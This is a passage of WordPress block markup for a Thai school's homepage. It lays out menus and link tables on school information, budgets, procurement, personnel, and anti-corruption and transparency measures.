{\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"c